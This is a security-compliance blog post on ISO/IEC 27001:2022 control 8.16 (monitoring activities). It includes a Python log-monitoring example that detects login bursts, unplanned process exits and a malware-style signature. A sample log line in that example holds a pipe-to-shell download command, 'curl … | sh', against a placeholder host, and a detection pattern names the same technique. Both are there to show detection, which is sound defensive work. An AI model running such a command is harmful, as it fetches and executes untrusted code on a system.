Series: New Controls in ISO/IEC 27001:2022 Annex A
- sujosutech
- 2 days ago
Monitoring Activities
In this article series, we are analyzing the implementation aspects of the 11 new controls of ISO/IEC 27001:2022 Annex A. The ninth article of the series explores the new technological control 8.16 (Monitoring activities).

Control
Control 8.16 (Monitoring activities) defines the best practices for the monitoring of networks, systems and applications in order to detect anomalous behaviour and evaluate potential information security incidents.
Attributes
Implementation of this control would help an organization detect anomalous behaviour exhibited by networks, systems and applications. This would help the organization implement corrective actions to avoid information security incidents and hence, address the confidentiality, integrity and availability requirements of its information systems.
Implementation
The organization should monitor networks, systems and applications for anomalous behaviour against an established baseline. Anomalous behaviour may include unplanned termination of processes, activity generally associated with malware, denial of service, unauthorized access attempts, etc. The organization should use monitoring tools that can handle large volumes of data and can recognize specific signatures as well as network or application behaviour patterns. The tools should generate alerts that personnel can interpret correctly so that appropriate actions may be taken.
The monitoring activities should be carried out in accordance with business requirements, perceived risks, and relevant laws and regulations. Records of monitoring should be maintained and stored securely by the organization for pre-defined time-periods.
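To make the baseline idea concrete, here is a small added example (not code from the article or from Sujosu Technology) that runs three detectors of the kind the control describes over a handful of constructed log lines: a sliding-window count of failed logins per source against a baseline threshold (unauthorized access attempts), a check for critical processes ending with a non-zero status (unplanned termination), and a regex signature for a command pattern generally associated with malware delivery. The log format, the `BASELINE` values, the signature and the `monitor`, `parse_log` and `Alert` names are all assumptions made for the example; a real deployment would take its baseline from observed normal behaviour and its signatures from a maintained rule set. Each alert carries a human-readable message so that personnel can interpret it, which is the point the control makes about alert quality.

```python
"""Baseline-driven monitoring over constructed log lines (added example, not from the article)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample events in an assumed "<timestamp> <host> <event> key=value..." format.
SAMPLE_LOG = """\
2024-05-01T10:00:01 web01 login_failed src=203.0.113.7 user=admin
2024-05-01T10:00:03 web01 login_failed src=203.0.113.7 user=admin
2024-05-01T10:00:04 web01 login_failed src=203.0.113.7 user=root
2024-05-01T10:00:06 web01 login_failed src=203.0.113.7 user=admin
2024-05-01T10:00:09 web01 login_failed src=203.0.113.7 user=backup
2024-05-01T10:00:12 web01 login_failed src=203.0.113.7 user=admin
2024-05-01T10:00:15 web01 login_ok src=198.51.100.4 user=alice
2024-05-01T10:01:00 db01 proc_exit name=postgres status=137
2024-05-01T10:01:30 db01 proc_exit name=logrotate status=0
2024-05-01T10:02:00 app02 proc_start name=sh cmd="curl -s http://example.invalid/x | sh"
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) ?(.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # quoted values may contain spaces

@dataclass
class Event:
    ts: datetime
    host: str
    kind: str
    fields: dict

@dataclass
class Alert:
    severity: str
    host: str
    message: str

def parse_log(text):
    """Parse the constructed log format into Event objects; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, host, kind, rest = m.groups()
        fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        events.append(Event(datetime.fromisoformat(ts), host, kind, fields))
    return events

# Assumed baseline: what "normal" looks like for the monitored estate.
BASELINE = {
    "max_failed_logins_per_source": 5,          # more than this within the window is anomalous
    "failed_login_window": timedelta(minutes=1),
    "critical_processes": {"postgres", "sshd"},  # non-zero exit of these is unplanned
    # Constructed signature for a download-and-execute pattern often seen in malware delivery.
    "signatures": [("pipe-to-shell download", re.compile(r"(curl|wget)\b.*\|\s*(sh|bash)\b"))],
}

def detect_failed_login_bursts(events, baseline):
    """Sliding-window count of login_failed per source IP, one alert per offending source."""
    alerts = []
    by_src = defaultdict(list)
    for e in events:
        if e.kind == "login_failed":
            by_src[e.fields.get("src", "?")].append(e)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start, fired = 0, False
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > baseline["failed_login_window"]:
                start += 1
            count = end - start + 1
            if count > baseline["max_failed_logins_per_source"] and not fired:
                users = sorted({x.fields.get("user", "?") for x in evs[start:end + 1]})
                secs = baseline["failed_login_window"].total_seconds()
                alerts.append(Alert("high", evs[end].host,
                                    f"{count} failed logins from {src} within {secs:.0f}s targeting users {users}"))
                fired = True
    return alerts

def detect_unplanned_exits(events, baseline):
    """A critical process ending with a non-zero status is outside the baseline."""
    alerts = []
    for e in events:
        if e.kind != "proc_exit":
            continue
        name, status = e.fields.get("name"), e.fields.get("status", "0")
        if name in baseline["critical_processes"] and status != "0":
            alerts.append(Alert("high", e.host,
                                f"critical process {name} exited with status {status} (unplanned termination)"))
    return alerts

def detect_signatures(events, baseline):
    """Match command lines against the configured signature patterns."""
    alerts = []
    for e in events:
        cmd = e.fields.get("cmd", "")
        for label, pattern in baseline["signatures"]:
            if cmd and pattern.search(cmd):
                alerts.append(Alert("medium", e.host, f"signature '{label}' matched in command: {cmd}"))
    return alerts

def monitor(log_text, baseline=BASELINE):
    """Run every detector over the parsed log and return the alerts in detector order."""
    events = parse_log(log_text)
    alerts = []
    for detector in (detect_failed_login_bursts, detect_unplanned_exits, detect_signatures):
        alerts.extend(detector(events, baseline))
    return alerts

if __name__ == "__main__":
    for a in monitor(SAMPLE_LOG):
        print(f"[{a.severity.upper()}] {a.host}: {a.message}")
```

On the sample input this produces three alerts: the login burst from 203.0.113.7 on web01, the non-zero exit of postgres on db01, and the signature match on app02; the logrotate exit and the successful login stay silent because they sit inside the baseline. Alerts returned by `monitor` are the kind of monitoring record the control expects to be retained for a defined period.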
Artefacts
The contents and implementation of the following security policies and procedures may be impacted by the above control:
System Monitoring Policy – This policy defines the rules for monitoring of system use and related user activities.
Procedure for Monitoring Areas of Risk – This procedure defines the steps to detect unauthorized activities by monitoring system use within the organization.
Server and Network Device Monitoring and Maintenance Procedure – This procedure defines the steps for monitoring of servers, networking components and security appliances for both security and performance issues.
Security Operating Procedures – Rules for the monitoring of networks, systems and applications may be defined within security operating procedures.
Monitoring Records – Records of monitoring should be maintained by the organization.
How Sujosu Technology Can Help
Sujosu Technology helps organizations design and implement systems that prioritize cyber security, data privacy and compliance. Our services include:
Risk Assessments: Identifying cyber security and privacy requirements and vulnerabilities in applications and infrastructure.
Countermeasures and Solutions: Providing tailored strategies to prevent, detect and recover from potential attacks.
Compliance Documentation: Helping you comply with the requirements of specific standards and regulations by compiling policies, procedures and other relevant manuals.
Training and Awareness: Equipping your team with the knowledge to address cyber security and privacy challenges effectively.
With Sujosu Technology’s expertise, your organization can build systems that are secure and resilient against security and privacy breaches. We can also help you achieve compliance with relevant standards and legislation. We also organize webinars and publish articles to create awareness on various aspects of cyber security and data privacy.
Partner with Sujosu Technology
Protect your data and ensure compliance with Sujosu Technology’s state-of-the-art cyber security and privacy services. Stay ahead of challenges and foster trust with your stakeholders.